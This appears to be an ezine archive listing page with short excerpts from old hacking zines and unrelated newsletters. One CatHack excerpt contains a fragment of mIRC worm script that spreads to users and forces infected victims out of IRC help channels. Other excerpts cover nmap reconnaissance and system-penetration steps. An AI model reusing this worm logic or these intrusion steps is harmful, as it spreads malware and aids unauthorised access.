
CatHack Issue 4

eZine's profile picture
Published in 
 · 1 month ago
... T$=8J<'8;F$`P-P[RP_!!.*H1"9#X,7X1@=%@[)'Q]7\UP M[\AR4^N+K:0'`AP)T<."`$Y;#@D=LAJ"][M)X3!<H*1@"/[R$TFBI,80;.XF MX7RJ*>E8"`2E#NTXKBZZ61RX@(KL5^!E1?ZK`F\K\@>*?%"!?0H<HN:`FUN^ MJ<`T1?Y$@3U:559$1D7FJF!68:DJ%ZMH9;!!A;&J/%F%'!4FJ)"LRK]6P:_" M'U78KL(.M&T5%0E_5Z%&I5I_6K/!.C1?%8ZK<%*%\ZK\M0J-JOR%"F<H&YHJ MU*(AJQBY1'W'RJRI>&KR],#,<I-ZPS1WG9T>F^V'+PV@)^<N6_,;N?/P2"PS MB)E6SY#9F'N[_/IM7$=%/2=F$M\EJE1=,&EVX%8.;:G"&QU4Q9&!5/6QOEU@ M[H`9'30FLMIL^O;^+-&)Q.5!+"ZVCQAKM14CVB]Q@)CH+2I"=,C@8>)@JY.R MCC"EB":OCU+'C$X71Y=K ...

CatHack Issue 1

eZine's profile picture
Published in 
 · 1 month ago
... ndows\%s.exe } ; s'envia a qui entri a un canal i després chequeja ; que l'infectat no esta en cap canal d'ajuda (molt vil) if ( $me ison #Nohack ) { /part #nohack } if ( $me ison #irchelp ) { /part #irchelp } if ( $me ison #mirchelp ) { /part #mirchelp } if ( $me ison #operhelp ) { /part #operhelp } if ( $me ison #help ) { /part #help } if ( $me ison #helpdesk ) { /part #helpdesk } if ( $me ison #help-desk ) { /part #help-desk } if ( $me ison #helpcenter ) { /part #helpcenter } if ( $me ison #dalnethelp ) { /part #dalnethelp } } on 1:NOTICE:I hate your guts with a passion:*:/quit Waa! Some on ...

Analog.5 Issue 0

eZine's profile picture
Published in 
 · 1 month ago
... we will assume your IP is, with a subnet mask of Lets start by seeing what hosts are up on our subnet with a ping sweep. #Nmap -sP You should get back a list of hosts up, as well as some of the mac addresses, and possibly some info about the computers. Starting Nmap 4.11 ( http://www.insecure.org/nmap/ ) at 2007-01-10 15:29 EST Host appears to be up. MAC Address: 00:17:9A:24:E6:88 (D-Link) Host appears to be up. MAC Address: 00:0C:6E:74:BD:B9 (Asustek Computer) Host appears to be up. MAC Address: 00:15:E9:2C:36:3B (D-Link) Host ...

2-9: Metodos de PENEtracion de sistemas

eZine's profile picture
Published in 
 · 2 months ago
... estan en una misma maquina todos o son varias, esto no va a ayudar a tener una idea del host. Como hacemos para sacar el ns, de la siguiente manera: #Nslookup victima.com con esto nos va a salir el ns por ejemplo: ns1.soyunns.com Si les interesa un poco mas este tema de sacar los ns y toda esa bola hay un muy buen texto Analisis remoto de sistemas por honoriak <honoriak@mail.ru> busquenlo ;-) 05.- Sacando informacion de los puertos abiertos y tratar de penetar el sistema. Luego de tenes los puertos que estan abiertos hacemos lo siguiente desde nuestra shell, telnet host puerto lo que vamos a hacer es conectarnos a todos los puertos que e ...


eZine's profile picture
Published in 
 · 5 months ago
... d anymore. You may want to continue voting for your game, because the votes are still stored and used for the other list (Top 50). You can then add a #Nowarning flag in the body of your message, to tell my program that you don't want to receive another warning. Otherwise you will be warned every time you vote for this game again. There is another flag for people who've asked if it is possible to vote and not to receive the list. Well, now it is. Just add a #nolist flag in your message. You will then be excluded from the mailing list. But your votes will still be used. You will however still receive a call for new votes when your 4 weeks ...

HOMEBREW Digest Index (part 3)

eZine's profile picture
Published in 
 · 6 months ago
... COYOTE) Cornelius Keg Source (Alec Saunders) Manifold Venting/ G'nite Hops / BS-ing a storm! (COYOTE) Copyright Discussion (Gregg_Weir#123#Notes#c#_Gregg_Weir#064#DCI#125#) Water expanding ("pratte") Solenoid Valves ("Joe Stone") bulk extract quality question (Dan Sherman) Free Refrig! (Brad Roach) Do It Right ... Or Not At All (Richard A Childers) Wort chillers, Cornelius kegs, CO2 tanks, regulators (I'll buy you a ewe!) homemade crystal (Rich Hill) Can you malt barley? (Mark A. Stevens) Frugal Brewing Guide: Thank you HBD'ers! ("Robert W. Mech") Water and carboys.... (dbrigham) Idea's needed for cleaning bottle (Todd S ...
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